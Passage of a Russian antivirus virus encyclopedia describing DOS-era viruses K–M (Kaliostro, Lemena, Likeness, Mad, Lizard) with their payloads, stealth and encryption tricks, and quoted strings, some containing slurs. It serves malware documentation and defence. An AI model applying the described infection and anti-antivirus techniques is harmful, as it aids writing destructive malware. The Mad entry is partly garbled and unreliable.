Опасные резидентные вирусы. Предназначены, видимо, для "взлома" станций BBS, работающих под MAXIMUS. При работе вирусы постоянно пытаются выяснить установлен ли в системе FOSSIL-драйвер. Если данный драйвер установлен, то вирусы "перехватывают" INT 14h (BIOS communications) и контролируют чтение из активного COM - порта (модем). При получении строки "1259hackvgisnh" (или "crack9db6n4mwd7") вирусы посылают в COM- порт строку "Паpоль введен веpно" и взводят флаг "ожидания команд взломщика". При получении символа "1" или "2" вирусы эмулируют нажатие на клавиши s,KeyPad-2,Enter или s,KeyPad-8,Enter соответственно. При получении символа "3" вирусы сбрасывают свой флаг "ожидания команд взломщика". Kaliostro.2098 контролирует обращение к файлу LOGO.BBS и посылает в COM-порт текст "CRACK IT .....". Содержат текст "Ха Ха Ха .... I am Kaliostro 3.0 © Dred".

Kampana (1,2)

Очень опасные загрузочные вирусы. При 400-ой загрузке с инфицированного жесткого диска, вирусы уничтожают информацию на этом диске и выводят текст "Campaдa Anti-TELEFONICA (Barcelona)".

Karina.850

Неопасный нерезидентный вирус. После 23 сентября выводит на экран переливающийся текст:
Имеет строку "KarinaB".

Karnavali.1972

Неопасный резидентный файлово-загрузочный вирус. Заражает EXE-файлы и загрузочный сектор диска C:, не проверяя является ли данный сектор активным и не сохраняя его. После заражения 60 файлов выводит на экран текст:
K A R N A V A L I O F P A T R A S ! ! !
* * * P A T R A S H / Y * * *
И "забивает" экран различными цветными символами так, что это действительно смахивает на некий карнавальный праздник.

Karol.1000

Неопасный резидентный вирус. Пытается затруднить анализ своего кода, используя вызов INT 1, 8, 9 для вызова своих подпрограмм. Содержит строку "KaRoLmArKs V2.3".

Kate.582, 585

Неопасные резидентные вирусы. Периодически "перезагружают" систему. Содержат тексты "KATE 1.01b", "KATE 1996 - © ORIEL software company".

Katya.732

18 декабря выводит на экран текст:
С днем рожденья,Катя

Keypress.Platon

Опасный резидентный вирус. При открытии файла USER.BBS вирус записывает в него нового пользователя Platon Potapov с максимальными привилегиями. Содержит строки:
Platon Potapov
SPb
311-63-83
Alfred

Keypress.Samsoft

Неопасный резидентный вирус. Каждые 10 минут пять раз повторяет последний введенный символ с клавиатуры. Каждый час выводит на экран слово "SAMSOFT".

Khizhnjak.based - вирусы

Появление данных вирусов обязано господину Хижняку - автору книги "Пишем вирус и антивирус". В данной книжице был опубликован исходный текст тривиального нерезидентного вируса, заражающего COM-файлы в текущем директории.

Khizhnjak.377

Может уничтожить информацию на диске A:.

Khizhnjak.542

Через 3 месяца нахождения на компьютере в MS-DOS версии не ниже 5.0 вирус "отключает" - делает невидимым текущий диск.

Khizhnjak.556

10 числа пытается уничтожить 100 первых секторов жесткого диска.

Khizhnjak.560

С января до мая форматирует нулевую дорожку первого жесткого диска, после чего пытается вывести на экран строку "Hello!", но вряд ли данная строка когда-нибудь появится. Содержит еще одну строку - "Killer-94".

Khizhnjak.632

27 числа пытается форматировать нулевую дорожку первого жесткого диска.

Khizhnjak.642

В зависимости от системного времени может попытаться найти файлы *.PAS и уничтожить информацию, находящуюся в них.

Khizhnjak.847

Иногда выводит сообщение "Благополучия и глобальности тебе мы". Имеет также текст "© 1993 AREG Soft".

Khizhnjak.1101

Иногда выводит сообщение: Привет! Я - вирус!!! И заразил несколько файлов! А ты куда смотришь? AIDSTEST где? Быстро запускай!!!

Khizhnjak.1112

После заражения каждого файла выводит текст "ok".

Khizhnjak.1134

После заражения файла выводит текст "Файл Заражен Успешно !Tapeworm !".

Khmir.1800

Неопасный резидентный зашифрованный вирус. Иногда создает на дисках файл "хмырь".

Kill.578

Опасный нерезидентный вирус. Может разрушить файлы COM-формата, но с расширением EXE. Содержит текст "KILL".

Kipa.1084

Неопасный резидентный вирус. Содержит строку "The KIPA new Version 3.1 copyright © 1993 by Sergey Hacker,Moscow;15 years old".

Kit.2384

Неопасный резидентный вирус. Периодически изменяет флаги клавиатуры - состояние клавиш Shift, Alt, Ctrl,... Содержит текст "Copyright 1991- 1999. KIT VIRUS (version 2.0).".

Kkv.1074, 1077

Неопасные резидентные стелс-вирусы-спутники. Перехватывают INT 09, 13h, 21h. Пытаются быть "невидимым" на уровне INT 13h (чтение с диска). При смене диска (f.0Eh INT 21h) создают файл KKV.90, в который записывают все вводимые с клавиатуры команды. Содержат текст "KeyKapture Virus v0.90 [Hellspawn-II] © 1994 by Stormbringer [P/S]".

Kkyyzz.1413

При старте программы, имя которой заканчивается на LI.EXE, вирус предпринимает какие-то действия с Novell Netware. При вводе слова "kkyyzz", при буферизованном вводе (f.0Ah Int 21h) вирус удаляет свой код из памяти.

Kohntark.Kali.641 (2)

Выводит на экран имя последнего инфицированного файла. Содержит строку "KaLi-4 / KФhntark".

Kommuna.800

Если в момент старта вируса значение сотых долей секунды меньше 10, то вирус выводит на экран "parovozik", движущийся к "OSTANOVKA". Если удалось заразить файл вирус выводит сообщение: "Don't warry please !!!".

Ksm.473

Неопасный нерезидентный вирус. Иногда выводит сообщение:
Fuck off,Asshole!!
- say to you KrylowSoft
Содержит строку "KSM".

Kuku.448

Опасный нерезидентный вирус. Может уничтожить программы, записав в их начало 49 байт кода, который при старте пишет на цветном мониторе слово "Kuku!".

Kvartirus.1499, Kvartirus.2000 (1,2)

Неопасные резидентные вирусы. Незначительно отличающиеся друг от друга две модификации вируса (Kvartirus.1499, 2000(2) зашифрованы). Иногда производят треск в динамике компьютера. Содержат текстовые строки:
Эта пpогpамма написана мной
Leningrad
Kvartirus.2000(1): Виpус-Кваpтиpус. Ленингpад 1992
Kvartirus.2000(2): Виpус-Кваpтиpус-2. Ленингpад 1993
Kvartirus.1499 текстовых строк не содержит.

Kvs.836

Заражает COM и EXE-файлы, внедряя свой код в их начало. Зараженные EXE- файлы по окончанию своей работы "лечит", запускает их, после чего опять заражает. Содержит текст "Zortech ©. Take Care of SoftWare ...".

Kvs.1942

Неопасный резидентный вирус. 31 числа выводит на экран текст:
Take Care of SoftWare ...
KieViruSoft Data Product © 1994 .
После чего отдает управление по адресу C800:0000h, пытаясь тем самым, видимо, вызвать подпрограмму форматирования жесткого диска, расположенную в BIOS. Имеет строки "KieViruSoft © Ver1.0", "Ver1.0".

Kysia.1536

Неопасный файлово-загрузочный вирус. Заражает MBR жесткого диска, при загрузке с которого вирус устанавливает в памяти свою TSR-копию. Производит поиск и заражение EXE-файлов при смене текущего диска (f.0Eh INT 21h) на дисках A: и B:. Пытается создать видимость форматирования жесткого диска, путем чтения его секторов.

0

12

L

Lame.2304

Неопасный резидентный полиморфный вирус. 15 сентября выводит на экран текст:
SHATTERED/Pantera/Cowboys from Hell
It's storming broken glass, corpses left in piles
Ungracious bludgeonment that breaks the earth for miles
Nothing can stop it, the day has come, from below it's catastrophic
Freezing, there's no healing families are dying
This world is shattered...all shattered
Life crushing turbulence, this wrath can't be denied
Wishing you could help your friends, standing where they died
Echoes haunting, a hollow planet, lacerations, dissected nation
Freezing, there's no healing families are dying
This world is shattered...all shattered
Содержит также строку "This is a polymorphic virus Блокирует нажатие на левую клавишу "Shift",а также каждый час блокирует нажатия на клавиши Escape, Backspace, Enter, Left Ctrl, Left Alt.

Legion.3274

Неопасный нерезидентный шифрованный вирус. Алгоритм заражения файлов заимствован из вирусов семейства OneHalf.

Lego.1000

Опасный резидентный шифрованный вирус. После 400 заражений файлов уничтожает некоторые поля CMOS-памяти.

Lemena.3544

Hеопасный резидентный полиморфный вирус. Располагает свою зашифрованную резидентную копию в области XMS и "перехватывает" INT 22h, обработчик которого тоже зашифрован и расположен в свободной области ядра DOS. По окончании работы любой программы вирус копирует свой код из XMS в видео-память (0BC00:0000h), расшифровывает его и "перехватывает" INT 21h. Вирус использует динамическую расшифровку собственного кода. Удаляет файлы: ANTI-VIR.DAT, AVP.CRC, CHKLIST.CPS, CHKLIST.MS, CHKLIST.TAV, CRC.SVS, FILES.VVL, FINGERP.VVF, IM.PRM, IVB.INI, IVB.NTZ, MSAV.CHK, SMARTCHK.CPS, \AV.CRC, \BOOT.CPS, \BOOT.MS, \BOOT.NTZ, \BOOT.TAV, \IV.INI, \PART.NTZ. Может вывести на экран текст "LEMENA'97" или "BOKEPH'97". Также содержит тексты "[LEMENA'97] by Bokeph from Batavia, Indonesia", "[MENA]".

Lemming.2247

Неопасный резидентный шифрованный стелс-вирус. При открытии инфицированных файлов вирусы лечат их. Не заражает программы из списка DRWEBAVPAIDSTESTVSAFEFPROT. Производит поиск в памяти антивируса TBDriver и правит его код.

Lenin.943

Нерезидентный вирус. Производит поиск *.EXE в директориях доступных через переменную PATH и в текущей. Записывается в конец файлов, но вставляет 5 байт прямого межсегментного "длинного" call на свое тело в оригинальную точку входа EXE-файла, корректируя при этом таблицу перемещаемых символов. Но при этом не проверяет наличие ссылки в этой таблице на данную точку, в результате чего такая программа при запуске может "завесить" систему. Иногда после заражения файла может выдать текст:
САМЫЙ! ЧЕЛОВЕЧНЫЙ! ЧЕЛОВЕК!
Ленин и сегодня всех живых держит мертвой хваткой упыря

Leo.1965

Опасный нерезидентный вирус. 13 апреля пытается отформатировать жесткий диск и произвести другие "пакости", но из-за ошибок деструктивный код вируса не сработает. Вирус содержит зашифрованный текст:
Version 3.0.
Virus has written by Leo..
Korolev city 1998

Leprosy.Busted.572

После заражения файлов выводит сообщение "Busted!" или "Program too big to fit in memory". Содержит текст "This is based on Leprosy-B. Thanx PCM2Busted, Strain A, version 1.0By ШАЧ@&ю·іЅ$ (Psychogenius), September '91".

Leprosy.Hellrais

Очень опасный зашифрованный вирус. Периодически уничтожает информацию в 4 случайных секторах диска. После 25 числа в пятницу выводит текст:
I'll be back...

Leprosy.Rythem.808

25 числа в пятницу уничтожает все файлы. Содержит текст:
Skism Rythem Stack Virus-808. Smart Kids Into Sick Methods
Dont alter this code into your own strain, faggit.
HR/SSS NYCity, this is the fifth of many, many more....
You sissys.....

Leprosy.Sandra.1809, 1356

Очень опасные полиморфные вирусы. Производят поиск файлов *.eXe и *.cOm и внедряют свой код в начало данных файлов, не сохраняя программный код. Уничтожают файлы: )(.ID, ANTI-VIR.DAT, C:\TBAV\VIRSCAN.DAT, CHKLIST.CPS,C:\CPAV\CHKLIST.CPS, C:\NAV_._NO, C:\NOVIRCVR.CTS,C:\VS.VS, C:\NOVIPERF.DAT,C:\TOOLKIT\FILES.LST, C:\FSIZES.QCV, C:\UNTOUCH\UT.UT1, C:\UNTOUCH\UT.UT2. Содержат строки "SANDRA*.eXe *.cOm ..", "This Virus is dedicated to Sandra H., V0.07", "© Nazg".

Leprosy.Seneca.483, 493

Очень опасные нерезидентные вирусы. 25 ноября выводят текст:
HEY EVERYONE!!!
Its Seneca's B-Day! Let's Party!
После чего уничтожают содержимое 255 секторов текущего диска. Также могут вывести сообщение "FATAL ERROR -- EXE is Fucked!!!" или
You shouldn't use your computer so much, its bad for you and your computer.

Leprosy.Strain.666 (1,2)

Очень опасный нерезидентный вирус. Выводит сообщения:
Program too big to fit in memory
или
ATTENTION! Your computer has been afflicted with
the incurable decay that is the fate wrought by
Leprosy Strain B, a virus employing Cybernetic
Mutation Technology™ and invented by PCM2 08/90.
Существует модификация вируса, которая выводит текст
Stealth Group Moscow Приглашает Вирусописателей !
Объединяйтесь ! Только Вместе Мы Прикончим
лОЗОТЕСТ , pOLYFUCK и Средства От Глистов !
Grosser & Mr.Tapeworm = Kool Men !"SPIDER" By Tapeworm !

Lev.693

Неопасный резидентный вирус. Ведет счетчик заражений в MBR. После 224 заражений возможно "осыпание" экрана и появление сообщения:
Бей жидов и Лозинского
Version d13,copyright © 1991 by LEV & "С.Х."

Lewd.3256, 4455, 4456

Неопасные резидентные вирусы. По нечетным числам месяца пытаются через некоторое время "повесить" систему. Иногда выводят на экран текст "Люся-а-а...". Lewd.3256 иногда выводит на экран текст "Главный Центр Напугивания.". Содержат текст "1996 by Lewd-H".

Lewd.34907, 34918

Опасные резидентные вирусы. Содержит в своем теле код архиватора LHA версии 2.13, который периодически пытаются записать на диск, спрашивая об этом разрешение пользователя. А также периодически выводят следующие сообщения:
Начиная с 1997 года активно начала свою работу MDP база по борьбе с нехваткой программного обеспечения.Сегодня мы препредлагаем вашему вниманию "File-Compression Program LHA version 2.13". Copyright 1997 by MDP Base. УСТАНОВИТЬ? [y/n]. Алло народ вы че обалдели у вас здесь еррора выползает.Больше не хулиганьте. О-о-й и куда это вы полезли!!! Голубчик и вы думаете это вас спасет??? Вам следовало бы обновить вашу версию дантиста WEBа.Он же вам каждый раз об этом напоминает.Старших надо слушаться!!! С MDP базы доносятся крики благодарности DRWEBу за отличный Executable File Decompressor например PKLITE с пакшей "-e" .Поблагодарим его за это.УРА!!! ПОКА. Ух ты у вас AIDSTESTик есть.Где откопали? Ну если не хотите то можете не отвечать. Опять на халяву? Ай-я-я-я-яй как вам не стыдно? Что бы больше такого не было! На MDP базе все по прежнему.РЕКЛАМНАЯ ПАУЗА. Upgraded Извините.Этого у нас нету.Приходите завтра. Вы точно хотите стереть эту директорию? Ну ведь она же исчезнет!Вы уверены? Нет не могу.Правда!Идите подумайте а потом прийдете. Ну уж нет.Вы мало думали.Надо все хорошенько обдумать! Ну ладно так уж и быть но помните что я вас предупреждал. У вас чего крыша едет? На ноль же делить нельзя.Я понимаю что это сложно понять но надо быть более рассудительнее. Анн дара рия кия макарена.Анн дара рия рия сол де рио.

Likeness.3551

Очень опасный резидентный файлово-загрузочный полиморфный вирус. Очень похож на вирусы OneHalf. По очень похожему алгоритму зашифровывает первый жесткий диск.Но при активном резидентном вирусе данные изменения не заметны, т.к., вирус пытается расшифровывать зашифрованные сектора диска "на лету" при обращении к ним.Но процедура шифровки и расшифровки содержит массу ошибок, из-за которых информация может быть расшифрована неправильно.При инсталляции в память вирус модифицирует код резидентной программы TBDSK, если она присутствует в памяти. Не заражает файлы, начинающиеся на: ADINF, ANTI, AIDS, DRWEB,TB,SCAN,CHK. Программа Dr.Web не расшифровывает диск при нахождении в MBR вирусного кода. Но при нахождении в памяти резидентной копии вируса, Dr.Web модифицирует его код таким образом, что вирус сам будет расшифровывать зашифрованные сектора на диске при обращениях к ним. Для того, чтобы попытаться расшифровать весь диск необходимо установить режим проверки всех файлов во всех каталогах первого жесткого диска и запустить тестирование программы Dr.Web. Но наиболее правильным было бы, при обезвреженном вирусе в памяти скопировать всю важную информацию на резервные магнитные носители.

Linux.Bliss.17892, 18064

Неопасные нерезидентные вирусы,"обитающие" в среде Linux (разновидность ОС Unix) и заражающие исполняемые файлы в формате ELF.Написаны на языке GNU C. Внедряются в начало ELF-файлов, сдвигая программный код вниз.

LivingDeath.3766

Очень опасный резидентный стелс-вирус. "Перехватывает" INT 8, 13h, 21h. Заражает EXE-файлы и MBR жесткого диска. Примерно через месяц после заражения MBR вирус читает в память 255 первых секторов первого жесткого диска, записывает на их место случайную информацию. После чего производит зашифровывание всего первого жесткого диска. По окончании данной шифровки вирус записывает на место информацию 255 первых секторов и выводит строку:
Press any key ...
При обращении к зашифрованным секторам через INT 13h вирус расшифровывает содержимое данных секторов "на лету". Таким образом, в инфицированной системе содержимое первого жесткого диска расшифровывается резидентной копией вируса. При загрузке с инфицированного уже зашифрованного жесткого диска вирус выводит текст:
I am the Living Death.
Press any key ...
И ждет нажатия на любую клавишу.

Lizard.1967

Опасный резидентный (на уровне Windows VxD-драйвера) вирус. Заражает DOS EXE-файлы и создает вирусный VxD-драйвер. При старте зараженого EXE-файла вирус создает свой VxD-дроппер (при его отсутствии) в одном из каталогов системы:
c:\windows\system\iosubsys\lzd.vxd,
c:\win95\system\iosubsys\lzd.vxd,
c:\windows.000\system\iosubsys\lzd.vxd.
При старте MS-Windows вирусный дроппер автоматически загрузится в систему. Далее Lizard.1967 заражает DOS EXE-файлы стандартным способом при попытке доступа к ним. 26 октября вирус удаляет эти файлы. Содержит текст "Lizard by Reptile/29A".

Lmd.2000

Неопасный резидентный полиморфный вирус. Также может вывести на экран фотографию Лозинского Д.Н. и текст "Lozinsky MuST DiE!".

Lobotomy.821

Неопасный нерезидентный вирус. После заражения файла может вывести текст:
Летний дождик напугал ...
Летний дождик напугал ...
Летний дождик напугал ...
Летний дождик напугал ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
Лаа-ба-та-мия ...
*** LOBOTOMYя v1.1beta ©1995 MSfVC *** +: ***

Lobotomy.966

Опасный нерезидентный вирус. Удаляет таблицы ревизора ADinf на всех дисках. Попытаться установить пароль "LOBOTOMY" в CMOS Setup и "завесить" систему.

Locust.735

Опасный резидентный вирус. Перехватывает INT 09,21h,2Fh. С вероятностью 1/8 блокирует нажатия на клавиши Escape, Enter или Space. И в 1 из 32 случаях изменяет нажатие на клавиши с латинскими буквами "A", "E", "O" на русские "А", "Е", "О". Содержит тексты ".COM", "Locust".

Locust.1456

Нерезидентный вирус. Заражает один файл - командный процессор, как правило COMMAND.COM, указанный через переменную среды COMSPEC. Причем, если размер COMMAND.COM не превышает 53336 байт, если он не формате EXE-файла, и если COMMAND.COM содержит область повторяющихся байт в конце файла. Вирус изменяет первые 3 байта инфицируемого файла, если первая инструкция не JUMP или 3 байта из области первого перехода, если первая команда - JUMP, на команду перехода на вирусный код, который Locust.1456 записывает в середину файла. Содержимое же места внедрения вируса, переносится в область повторяющихся байт. Размер инфицированного файла уменьшается на 240 байт. Вирус содержит ошибки, следствием которых возможно неточное восстановление файла при его лечении. Иногда может заполнить экран строкой "I'm Sleep-walker.". Содержит зашифрованную строку "(LOCUST-3)".

Locust.2486

Неопасный резидентный вирус. Если файл содержит в конце область из 2486 повторяющихся нулевых байт, то вирус записывает свой код в данную область, иначе внедряется в конец файла.

Login.2071

Неопасный резидентный полиморфный вирус. Внедряет полиморфный расшифровщик в середину заражаемого файла, а основной зашифрованный код в конец файла. 10 числа каждого месяца выводит на экран текст "This is Kustanai-Login. Is devoted Kuzmina Olya. TVA-96 me 16!"."Перехватывает" INT 9, 21h. При старте программы Login, вирус контролирует нажатия на клавиши и записывает скан-коды данных клавиш в свой буфер, находящийся в памяти. Не заражает программы,имеющие в своем буквосочетания Aids, Adinf, DrWeb, Scan, Command.

Lokjaw.Firefly.1087

Опасный резидентный шифрованный вирус. При старте некоторых антивирусных программ, удаляет их. Содержит тексты:
[Firefly] By Nikademus
Greetings to Urnst Kouch and the CRYPT staff.
American Jesus
Dont Pray On Me
Recipe for HAte
Atomic Garden
Its Dead Jim

Lokjaw.Firefly.1106

Опасный резидентный шифрованный вирус. При старте некоторых антивирусных программ, удаляет их.

Lokjaw.Zwei.808, 894

Опасные резидентные вирусы-спутники. При старте некоторых антивирусных программ, удаляют их.

Lonely.1000

Неопасный резидентный шифрованный вирус. "Перехватывает" INT 9, 1Ch, 21h. Заражает файлы при их запуске или закрытии. При открытии инфицированных файлов вирус "излечивает" их. При вводе с клавиатуры слова "малыш" вирус отключает режим заражения файлов, но оставляет режим "самоизлечивания". Проявляется "западанием" левой клавиши Shift. Содержит текст ""Одиночка" v1.0 ХАИ к.506 1995г.".

Lout.805

Опасный резидентный вирус. Иногда выводит на экран фразу "Андреев - хам и жадина.". После чего может обнулить в Boot-секторе диска C: значение количества головок диска (+1Ah).

LR1.2884

Опасный резидентный шифрованный вирус. Удаляет файлы CHKLIST.MS, CHKLIST.CPS, ANTI-VIR.DAT, SMARTCHK.CPS. При нажатии на Alt-PrtSc (SysRq) вирус выводит текст "LR1#00008", где числовое значение - это номер поколения вируса.

LSD.1600

Очень опасный, замещающий программный код, вирус. После заражения всех файлов текущем каталоге производит графический видеоэффект (двигающиеся цветные узоры) и.

Luce.4619

Очень опасный резидентный полиморфный вирус. Уничтожает исполняемые файлы, находящиеся в каталогах F77,MSFORT,GAMES,GAME, UTIL; записывая в их начало троянский код. Также вирус может записать в MBR троянский код, выводящий на экран текст "Hard disk destroyed by mutant-virus "LUCIFER"". Вирус содержит тексты "Virus Luce.4619 by OVER-X.", "POLYMORPHIC ALGORITHM IS CREATED BY OVER-X".

Lucifer (1,2)

Опасные нерезидентные загрузочные вирусы. При загрузке системы с инфицированного флоппи-диска вирусы заражают активный загрузочный сектор первого жесткого диска, считая, что он расположен на стороне -1, цилиндре - 0, секторе - 1. При загрузке же системы с инфицированного жесткого диска вирус пытается заразить гибкий диск в дисководе B:. Оригинальные загрузочные сектора вирусом не сохраняются. При загрузке вирусы пытаются самостоятельно найти и отдать управление системным файлам IBMBIO.COM или IO.SYS. Если данные файлы не будут найдены, то вирусы выводят сообщение: Lucifer (1) - "Sys?", Lucifer (2) - "**Oops!**" и "вешают" систему. Содержат тексты "Lucifer" и "Lucifer Messiah -- ANARKICK SYSTEMS v6.1 ©1990", или "Lucifer Messiah of Anarkick Systems v.4.3 © 1992".

Lucy.5086, 5286, 5505

Опасные резидентные полиморфные вирусы. Из-за ошибок могут разрушать инфицируемые файлы. При нахождении в памяти программ: SCAN,VSHIELD, CLEAN, FINDVIRU, GUARD,VIVERIFY,TB,AVP,VIRSTOP,NOD,HIEW,ICE,AVG,F-PROT, CHKDSK,DRWEB,TDPR.

Lust.120, 121, 137, 191, 196, 210, 258

Неопасные вирусы. Lust.210 производит поиск *.COM-файлов в текущем каталоге и записывает свой код в область повторяющихся байт в теле программы, если они имеются.

Lx.1358

Опасный резидентный вирус. 13 числа записывает в файл C:\AUTOEXEC.BAT похабный текст и команду форматирования диска C:.

LZR

Опасный загрузочный вирус. Может уничтожить содержимое жесткого диска. Имеет текст "LZR".

0

13

M

Maaike (1,2)

Шифрованные вирусы-спутники. Для всех запускаемых EXE-файлов создают вирусы-спутники COM-формата. При резидентных вирусах программы с расширениями, отличными от COM или EXE, запускаться не будут. Иногда могут заполнить экран надписью: "Maaike I Love You !". Из-за ошибок могут приводить к "зависанию" системы.

MacGyver.2803 (1,2)

Содержат зашифрованную текстовую строку "SCAN CLEAN ZTEST CKVI EXEGOD VPIC [MACGYVER V1.0 Written by JOEY in Keelung. TAIWAN 1992]".

MacGyver.4112

Неопасный резидентный файлово-загрузочный вирус.Заражает COM,EXE-файлы, MBR жесткого диска и загрузочные сектора дискет. При заражении дискет форматирует дополнительную дорожку, на которую записывает свое продолжение и оригинальный загрузочный сектор.

Mad.223

Неопасный нерезидентный полиморфный вирус.Является "порождением" вируса Mad.5131. Mad.223 не является зашифрованным вирусом, но при заражении в январе COM-файлов вирус Mad.5131 "перемежает" "рабочие" команды вируса Mad.223 (поиск файл-жертв и их заражение) всевозможными "мусорными" командами. В результате максимальная длина постоянных вирусных байт не превышает 6 байт. В дальнейшем такой вирус Mad.233 производит поиск *.COM - файлов в текущем каталоге и заражает их собственной уже неизменяемой копией. Вирус содержит текст "MiniMad 2.0 BETA! [c]Black Angel".

Mad.279 (1-3)

Опасные нерезидентные вирусы. Заражают только COM-файлы с первой командой JUMP (0E9h ?? ??). Оригинальный адрес перехода вирусы записывают в поле даты создания файла. Поэтому, если данный файл подвергнется редактированию, то восстановить его работоспособность не удастся. Вирусы содержат текст "The MiniMad version 1.0 beta*.com".

Mad.1288

Очень опасный резидентный шифрованный вирус. При неаккуратной трассировке кода, вирус может уничтожить 16 первых секторов первого жесткого диска. Резидентная копия вируса, при старте каждой 33-ей программы, уничтожает случайный сектор жесткого диска. Не заражает программы с именами *EB, *ST, *NF, *WE. Содержит текст "THE MYTH [C]Black Angel : Next time ,Use a condom ...".

Mad.2631, 2748

Очень опасные резидентные полиморфные вирусы. 13 числа уничтожают содержимое CMOS-памяти и первого жесткого диска. При каждом 1001 (2000 для Mad.2748) нажатии на клавиши уничтожают случайный сектор на диске. Не заражают файлы, имена которых заканчиваются на EB, ST, EW (DRWEB, AIDSTEST, HIEW). Содержат тексты "BETA", "THE MAD I virus ©Black Angel" или "THE MAD version 1.2 virus ©Black Angel".

Mad.3544, 4268, 4340, 5054

Очень опасные резидентные полиморфные вирусы. При неаккуратной трассировке вирусного кода могут уничтожить 10 первых секторов первого жесткого диска. При запуске программы WIN.* Mad.3544 выключает драйвер мыши (записывает в обработчик INT 33h команду IRET) и выводит текст "WINDOWS MUST DIE!". Иногда помещают в буфер клавиатуры слово "MAD". 13 числа месяца вирусы заражают COM-файлы, имеющие первую инструкцию программного кода JUMP (0E9h ?? ??) вирусами Mad.279 (1-3). В вирусах имеется код, шифрующий загрузочные сектора дискет, но при активных резидентных вирусах данные сектора расшифровываются в памяти компьютера. Mad.4268. Mad.4340 производит поиск в записываемой на диск (f.03 Int 13h) информации строки "USER", меняет ее на "LOH!" и помещает в буфер клавиатуры текст "MUST DIE!". Mad.5054 7 ноября уничтожает содержимое CMOS-памяти, по 16 секторов на каждой головке первого жесткого диска и выводит текст "Seventh November - black day of a calendar...". Mad.5054 ищет в файлах строку "Rar!" (заголовок архиватора RAR) и изменяет ее на "Mad!". Причем, в зараженной системе это будет не заметно для пользователя,но при переносе такого архива в "чистую" систему,архиватор RAR не "признает" такой файл своим. Mad.5054 также иногда "сбивает" развертку монитора. MAD 1.6 Copyright by Black Angel 24-09-96 : ...continue conversation...держимое CMOS-памяти.Вирус записывает свой код (4608 байт) на диск (9 секторов), начиная с 9 сектора первой дорожки первого цилиндра. Резидентная копия вируса занимает 231 байт, устанавливается по адресу 0054:0000 и "перехватывает" путем врезки в оригинальный обработчик INT 21h вызов случайного прерывания из второй половины таблицы векторов прерываний (INT C0h-C7h), которое "контролируется" резидентной копией. Данный код считывает в память по адресу 9A00:0000 при каждом вызове f.30h Int 21h (GetDOSVersion) основной вирусный код с жесткого диска и отдает ему управление с целью определения имени, стартовавшей программы и ее заражения. Вирус отказывается устанавливать свою резидентную копию при работе в Windows. При заражении файлов вирус читает первые 1000 байт файла в память компьютера и производит поиск последовательности байт B4h ?? CDh 21h или B8h ?? ?? CDh 21h (загрузка в регистр AH или AX какого-то значения и вызов прерывания 21h DOS). Вместо байт CDh 21h вирус записывает последовательность CDh CCh - вызов INT CCh, которое транслируется вирусом в "законное" прерывание INT 21h DOS. При активном резидентном вирусе данные программы будут работать нормально, но в "чистой" системе "поведение" таких программ - непредсказуемо. В январе вирус заражает COM-файлы полиморфным вирусом Mad.223 (см. Mad.223), который в дальнейшем распространяется самостоятельно, независимо от вируса-родителя Mad.5131. Не заражает файлы, имена которых заканчиваются на EB,ST,86,NF,VP,AN.

MadSatan.Abba

Неопасный резидентный вирус. Ведет счетчик заражений в файлах ABBAлєnn, где nn - является порядковым номером заражений. При достижении nn значения 59, на монохромный дисплей в графическом видеорежиме выводится фотоизображение лица, видимо, китайской национальности.

MadSatan.Ruei

Модификация вируса MadSatan.Abba. Счетчик заражений ведется в файле Satan_nn. При нехватке памяти выводит сообщение "Ruei-Chiang Virus by Mad Satan".

Magdzie.1114

Опасный резидентный стелс-вирус. Заражает EXE-файлы при их закрытии. При открытии или запуске инфицированной программы удаляет из нее свой вирусный код. Удаляет файлы CHKLIST?.*. Выводит довольно симпатичный движущийся графический узор.

Maiden.1726

Полиморфный резидентный вирус. Пытается открыть файл user.bbs и завести в нем пользователя Hacker. Содержит тексты "Iron Maiden", "[MARAUDER`s Mutation Device v0.9]".

Major.1644

Опасный резидентный вирус. В случайные моменты времени пытается открыть файл \BBSV6\BBSAUDIT.DAT или \BBSV6\BBSUSR.DAT. Вирус ищет в данных файлах строки Puppet, Image, Gnat, Minion, Cindy, F'nor. Если какая- либо строка найдена, то вирус корректирует соответствующую строку BBS- файла. Содержит текст "The Major BBS Virus created by Major tomTugger".

MangeTout.1091, 1099

Резидентные очень опасные вирусы. Используют оригинальный алгоритм шифровки своего кода. Расшифровывают свои подпрограммы в сегменте с адресом 0054:0000 и отдают им управление. Перехватывают INT 08, INT 09, INT 21h. При вызове f.36h INT 21h (информация о свободном месте на диске), вирусы подставляют в стек адрес возврата из прерывания на свой код. Анализируют возвращенные INT 21h значения - хватит ли места для заражения файлов на данном устройстве. После чего производят поиск файлов *.EXE и *.COM с помощью функций FindFirst, FindNext INT 21h. Если в течение часа не было ввода с клавиатуры, то MangeTout.1099 пытается отформатировать несколько секторов жесткого диска, а MangeTout.1091 уничтожает пароль в CMOS-памяти и стирает содержимое MBR. После этого вирусы "вешают" систему. Содержат инструкции i286.

Manitoba

Опасный загрузочный вирус. Не сохраняет оригинальные boot-сектора флоппи-дисков.

Manu.4096

Неопасный резидентный вирус. Предусмотрен вывод сообщения "Parity error 0000:F243", но вряд ли он когда-нибудь наступит. Содержит текст "Manu virus Version 1.0".

Manuel.2209

Неопасный резидентный шифрованный вирус. Устанавливает свою резидентную копию в область HMA, изменяя адрес в межсегментном косвенном переходе оригинального обработчика INT 21h на адрес вирусного обработчика. Иногда щелкает динамиком. Содержит текст "Manuel strikes again".

Mao.1465 (1,2)

Неопасные резидентные вирусы. 9 сентября, в день рождения и 26 декабря, в день смерти Мао Цзэдуна исполняет две различные китайские мелодии.

Marauder.860

Опасный вирус. 2 февраля производит поиск файлов *.* в текущем каталоге и уничтожает их, производя в них запись текста
Н [Marauder] 1992 Hellraiser - Phalcon/Skism.

Mariner.5000

Опасный резидентный шифрованный вирус. В июле выводит на экран картинку солнца, моря и плавающего по нему кораблика, а также надпись "BCE HA MOPE !!!". В момент когда кораблик плавает по экрану, вирус пытается уничтожить информацию на жестком диске, правда, это не всегда ему удается. Картинка с корабликом была отлажена лучше. Также вирус может по воскресеньям записать в файлы с расширениями COM, EXE, PAS, CPP фрагмент следующего текста:
I`m the Ghost V1.2.
Check. Your move, Mr.AntiVirus !
My author`s coordinates are:Sun system, Earth, Europe, Russi...
2B continued... The more we know,the less we show.
There is nothing in the world that I ever wanted more than to never
feel breaking apart all my programs again.

Markiz.1972

Вот что о своем "произведении" написал в "документации", распространяющейся вместе с исходными текстами сам автор вируса:
